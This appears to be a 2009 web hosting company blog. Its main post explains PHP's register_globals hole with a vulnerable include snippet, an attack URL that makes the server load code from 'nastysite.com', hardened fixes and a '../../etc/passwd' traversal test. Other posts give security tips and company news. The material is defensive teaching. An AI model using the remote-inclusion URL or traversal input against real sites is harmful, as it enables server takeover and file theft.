24 June 2009

REGISTER_GLOBALS = OFF

Posted by Norman under: Guides.

You may be aware that we finally decided to disable register_globals in PHP by default on all servers, which annoyed some users. While I was reading this great book I found a good example of how easy it is to hack a PHP website when register_globals is turned ON:

Imagine an index.php file that contains the following code:

<?php
    // $basedir is never assigned in this script; with register_globals=On a
    // request parameter named "basedir" silently supplies its value.
    require_once ($basedir.'/somecode.php');
// More code that is perfectly safe follows
?>

Code like this is found in a large share of PHP software: it simply includes the legitimate somecode.php, which contains more PHP code, and runs it.

If register_globals is turned ON, the attacker can request your index.php using a URL like this one:

http://www.yourwebsite.com/index.php?basedir=http://www.nastysite.com

The result is that our vulnerable code loads and executes the code at http://www.nastysite.com/somecode.php. That means the attacker can make your server run a somecode.php of his own, i.e. arbitrary PHP code, intended to take over your site. Two notes for the practitioner: fetching that file over HTTP also requires allow_url_fopen (or allow_url_include on PHP 5.2 and later) to be enabled, but even with those turned off the same bug lets the attacker point $basedir at a local path, for example a file he has already uploaded, so the real fix is for the script to assign $basedir itself instead of relying on a server setting.

I hope this explains why we disabled register_globals on all servers.
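The attack and the fix side by side, as an added example that is not code from the original post. The names $basedir, somecode.php and www.nastysite.com are the post's own; simulate_register_globals(), the $safe_pages whitelist and its about.php entry are assumptions made for this example. register_globals cannot be switched on from inside a script (it is a per-directory php.ini/.htaccess setting), so the example reproduces its effect by hand, then shows two hardened forms that stay safe even on a server where the setting is still ON:

```php
<?php
// Added example, not code from the original post. $basedir, somecode.php and
// www.nastysite.com come from the post; everything else here is an assumption.

// Quick check for the setting itself. ini_get() returns "1"/"0", or false on
// PHP versions where register_globals no longer exists at all.
function register_globals_is_on() {
    return (bool) ini_get('register_globals');
}

// 1. What register_globals=On effectively does before your script runs: every
//    request parameter becomes a global variable. Shown only to make the attack
//    reproducible with the setting OFF; never do this in real code.
function simulate_register_globals(array $request) {
    foreach ($request as $name => $value) {
        $GLOBALS[$name] = $value;
    }
}

// 2. The vulnerable pattern from the post: $basedir is never assigned, so
//    whatever the request put into it decides which file gets included.
//    The path is returned instead of include'd so the effect can be printed.
function vulnerable_include() {
    global $basedir;
    return $basedir . '/somecode.php';
}

// 3. Hardened form A: assign the variable unconditionally from something the
//    request cannot influence. The assignment overwrites any injected value,
//    so this is safe even while register_globals is still ON.
function hardened_include_a() {
    $basedir = dirname(__FILE__);          // __DIR__ on PHP 5.3+
    return $basedir . '/somecode.php';
}

// 4. Hardened form B: when the page to load really must come from the request,
//    map the untrusted name onto a fixed whitelist and verify that the resolved
//    path still lies inside the application directory (catches symlinks and
//    "../" traversal). Returns null when the request should be refused.
function hardened_include_b($page) {
    $safe_pages = array('home' => 'somecode.php', 'about' => 'about.php'); // assumed
    if (!isset($safe_pages[$page])) {
        return null;                       // unknown page: refuse, never guess
    }
    $root = realpath(dirname(__FILE__));
    $path = realpath($root . '/' . $safe_pages[$page]);
    if ($path === false || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;                       // missing, or resolved outside the app dir
    }
    return $path;
}

// Demonstration with the request from the post: ?basedir=http://www.nastysite.com
echo "register_globals on: " . (register_globals_is_on() ? "yes" : "no") . "\n";
simulate_register_globals(array('basedir' => 'http://www.nastysite.com'));
echo "vulnerable : " . vulnerable_include() . "\n";  // http://www.nastysite.com/somecode.php
echo "hardened A : " . hardened_include_a() . "\n";  // <app dir>/somecode.php
var_dump(hardened_include_b('home'));                  // app-local path, or NULL if somecode.php is absent
var_dump(hardened_include_b('../../etc/passwd'));      // NULL: not in the whitelist
```

Form A is the one-line fix for the post's snippet: once the script assigns $basedir before using it, the request parameter of the same name is simply overwritten. Form B is for the case where the included file genuinely depends on user input; the whitelist decides what may be loaded and the realpath() check makes sure the decision cannot be undone by a symlink or a traversal sequence in the file name.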


23 June 2009

Important security update!

Posted by Norman under: Guides.

As many of you know, there has been a large surge of hacking activity targeting websites that use open source software (especially Joomla, phpBB and others). The attackers use various exploits in older versions of this software to gain access to the whole hosting account and then use it to send spam or distribute malware. We have even seen attacks that install full packages such as wikis and forums to spam search engines; these "planned" attacks are practically impossible to recover from, and we have to terminate the infected hosting accounts.

Fortunately, the vast majority of these attacks can be avoided by following a few very easy steps:

  1. If you installed (or are installing) PHP or CGI software just to try it out (like the phpBB forum, Joomla CMS, etc.) and you no longer use it, simply delete it and delete its database. If you used the Fantastico installer to install the software, use Fantastico to delete the installation.
  2. The same applies to software plug-ins and themes: if you no longer use a theme/template, remove it; if you no longer use a plug-in, delete it.
  3. When installing software, always choose a user name and password for the software's administration that are different from your main hosting account user name and password. If the software is compromised, the attacker will then not be able to gain access to the whole hosting account or your email.
  4. When installing software, avoid easy-to-guess logins like username: test and password: test.
  5. If you installed software and want to continue using it, keep it up to date (including any themes, plug-ins and widgets): subscribe to the software's mailing lists or RSS feeds to get security announcements, and patch/upgrade your copy as soon as possible.

As usual, feel free to contact us using the helpdesk if you have any questions.


31 May 2009

Something from the Past

Posted by Norman under: Uncategorized.

This is a full screenshot of what the 2MHost website looked like in 2002 :)


12 April 2009

PHP form to mail

Posted by Norman under: Guides.

I just want to mention that we have added a free PHP form-to-mail script for use in your website.

http://www.2mhost.com/desk4.2/kb.cgi?do=read&id=73&lang=en

The form mailer needs minimal configuration and will work with ANY HTML form; the sample HTML form (included in the download file) shows a simple way to validate forms using jQuery and the Validation plugin.

Hope you like it.


30 March 2009

SSD servers, postponed

Posted by Norman under: Uncategorized.

Our plans for SSD-based hosting servers have been postponed for a while. Although the performance was amazing, the total space available per server was very small: the best we could get from a RAID-5 of 4 drives was only 130 GB, which meant the hosting packages would have to start at $10/mo for 1 GB of space. Although we managed to increase that to 5 GB for media files (movies, zip files, etc.), we still think $10/mo is too much for such a relatively small space.

Again, the project is postponed. We can't resist wanting to be the first web hosting provider to use SSD drives, but what can we do? Any feedback is really appreciated.

